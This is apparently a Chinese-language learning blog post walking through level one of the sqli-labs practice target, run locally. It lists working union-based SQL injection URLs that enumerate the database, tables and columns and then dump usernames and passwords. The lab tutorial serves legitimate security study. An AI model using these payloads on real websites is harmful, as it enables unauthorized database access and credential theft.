前言
最近一段时间想切入安全领域,因为本身有做数据库运维工作,就打算从sql注入方向切入。而sql注入除了学习日常书本上的概念外,需要有个实践的环境,刚好看到sqli-lab这个靶场,就打算先用这个来学习。
安装部署
网上很多关于安装部署的教程,很简单。本人是下载PHPStudy进行部署的。由于sqli-lab是用php5版本,现在很多一体化环境(我用wamp)的php都是7版本。我试过用github上有人修改sqli-lab适配php7版本,但是不清楚为什么报错的时候不会回显,这严重影响调试,所以还是换成PHPStudy,并且切换为php5版本进行部署就好了。
Less1
进入页面测试
输入http://localhost/sqli-labs/Less-1/进入第一关,地址和读者的部署情况有关。我是直接把sqli-lab解压放到apache的www目录下。
第一关会要求我们输入一个id作为传参,我们尝试id=1的情况:
之后尝试id=2、id=3……一直到id=13,发现为空:
证明id=13不存在。
确定闭合方式
我们可以看一下php的源码,打开Less-1的index.php
可以看到红色框起来的部分,我们传入的id直接拼接到sql查询语句中。这给我们看到一个sql注入的漏洞,就是通过单引号闭合变量。例如我们传参的时候带入一个单引号, 然后通过 -- 或者 # 忽略后续的语句,就形成了sql注入。
如果我们看不到源码,怎么知道它是单引号闭合呢?漏洞都得测试出来,我们可以尝试添加单引号、括号、双引号等等方式去测试闭合情况。比如这里如果传入id=1':
因为多传了一个单引号,所以实际拼接的语句变成了:
SELECT * FROM users WHERE id='1'' LIMIT 0,1这个语句多了个单引号,肯定报错了。
判断列数
接下来判断这个sql查询一共有多少列。输入:
http://localhost/sqli-labs/Less-1/?id=1' order by 1-- asd这里通过单引号闭合,已经形成形成了注入。依次增加order by的数字,发现到order by 4的时候,出现报错:
证明sql语句显示的只有三列。
联合注入
判断了列数后,我们看看能否通过联合查询回显数据,输入:
http://localhost/sqli-labs/Less-1/?id=13' union select 1,2,3-- asd
可以看到第二、三列注入到“Your Login name”和“Your Password”的显示位置。我们输入id=13的原因在于之前判断了id=13是没有数据的,那回显的数据就会用union后面的数据了,如果输入id=1,那回显就是正常,而非我们想要注入的结果。这就是联合注入的关键!
查询具体的数据库名、表名、列名
联合注入成功后,其实离胜利已经很近了。接下来要把查询回显的列替换成查询数据库名、表名、列名。先查询数据库名:
http://localhost/sqli-labs/Less-1/?id=13' union select 1,database(),3-- asd
通过回显可以看到目前查询的表在名为security的库中。
接下来查询security库中有什么表,通过information_schema的tables表可以找出来:
http://localhost/sqli-labs/Less-1/?id=13' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- asd
使用group_concat可以把全部表名显示出来。不过有时候回显的位置可能有长度限制或者显示限制,这种方式有时候不准确,所以更实在的方式是利用limit一个一个查出来:
http://localhost/sqli-labs/Less-1/?id=13' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 3,1 -- asd
当我们从limit 0,1一直到limit 3,1时,发现users这个表很可能就是包含用户名密码的表,我们要把它的数据查出来。查出来的前提是知道列名,通过information_schema的columns可查出:
http://localhost/sqli-labs/Less-1/?id=13' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' -- asd
通过回显看到username和password似乎就是我们想要找的两列,我们把它们查出来:
http://localhost/sqli-labs/Less-1/?id=13' union select 1,group_concat(username),group_concat(password) from security.users -- asd
至此账号密码已经查出,sql注入成功!
小结
第一关是很简单的注入,不过其涉及到的内容很多,刚接触sql注入的朋友可能会有点懵。确实我刚开始也有点懵,因为一般做开发、做运维的朋友不会这样去写sql语句。当概念都了解了之后,就会觉得其实也就这么回事,Less-1没什么高大上的。另外注意这个靶场环境一定要搞好,否则很可能出现输入同样的查询,得出来不一样的结果,严重影响学习和理解效率。
